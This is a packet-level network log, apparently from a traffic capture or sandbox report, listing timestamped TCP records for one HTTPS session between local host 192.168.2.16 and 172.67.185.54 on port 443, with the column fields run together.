                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287537098 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287548065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287595987 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325182915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325203896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325409889 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325423002 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325481892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328110933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328130007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328207016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328218937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328274965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328908920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328927994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328999996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329010963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329068899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329538107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329555988 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329639912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329652071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329706907 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404673100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404695034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404787064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404896021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404918909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404952049 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405458927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405483007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405582905 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405599117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406542063 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406558990 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406644106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406657934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446366072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446402073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446569920 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446585894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446815014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446832895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446901083 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446913958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447793007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447815895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447866917 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447880030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447907925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.489602089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.489619970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.489797115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.489809990 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.523469925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.523497105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.523555040 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.523576021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.523626089 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.524466038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.524478912 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.524558067 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.524569035 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.525316000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.525333881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.525378942 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.525391102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.525424957 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.526161909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.526175022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.526253939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.526266098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.565386057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.565403938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.565515041 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.565578938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.566148043 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.566160917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.566245079 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.566262007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.567006111 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.567024946 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.567092896 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.567106009 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.612667084 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642323017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642343998 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642431974 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642467022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642529964 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642786980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642806053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642884016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642896891 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.642951012 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.643523932 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.643542051 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.643635988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.643647909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.643701077 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.644340992 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.644356012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.644433975 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.644445896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.644505024 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.681830883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.681849957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.681925058 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.681937933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.681993008 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684067011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684079885 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684153080 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684165001 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684240103 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684362888 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.684427977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.685085058 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.685098886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.685174942 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.685187101 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.685240984 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.686388016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.686399937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.686470985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.686482906 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.686532021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761200905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761217117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761311054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761379957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761421919 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.761444092 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.762015104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.762033939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.762109995 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.762124062 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.762177944 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763137102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763150930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763223886 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763235092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763292074 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763905048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.763916969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.764017105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.764028072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.764087915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.802373886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.802386999 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.802474022 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.802491903 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.802571058 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803107977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803118944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803311110 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803373098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803453922 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803724051 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803746939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803809881 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803822994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.803874969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.804362059 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.804373980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.804446936 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.804459095 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.804517984 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.879846096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.879861116 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.879966974 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880047083 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880110025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880294085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880306959 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880379915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880392075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880446911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881824970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881843090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881913900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881926060 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881978989 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882450104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882467031 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882539034 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882550955 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882620096 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883186102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883198023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883275986 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883287907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883346081 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921180010 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921194077 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921288013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921302080 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921363115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921814919 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921833038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921895981 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921909094 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921936035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921971083 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922589064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922602892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922678947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922691107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922744036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923305988 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923331976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923392057 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923403978 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923429966 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923459053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998542070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998557091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998625994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998640060 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998673916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998698950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998698950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999063015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999082088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999145031 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999166012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999186993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000874996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000886917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000962019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000973940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001636982 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001656055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001724005 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001737118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002094030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002105951 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002193928 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002206087 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.039930105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.039957047 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040023088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040038109 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040676117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040688038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040760994 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040772915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041218996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041237116 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041287899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041301012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041327000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042004108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042016983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042088985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042100906 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.091670990 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117233038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117247105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117326021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117338896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117391109 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117748022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117770910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117830992 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117841005 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117866993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117886066 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.118451118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.118465900 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.118535042 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.118546963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.118601084 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119781017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119807005 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119868994 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119883060 CET44349717172.67.185.54192.168.2.16
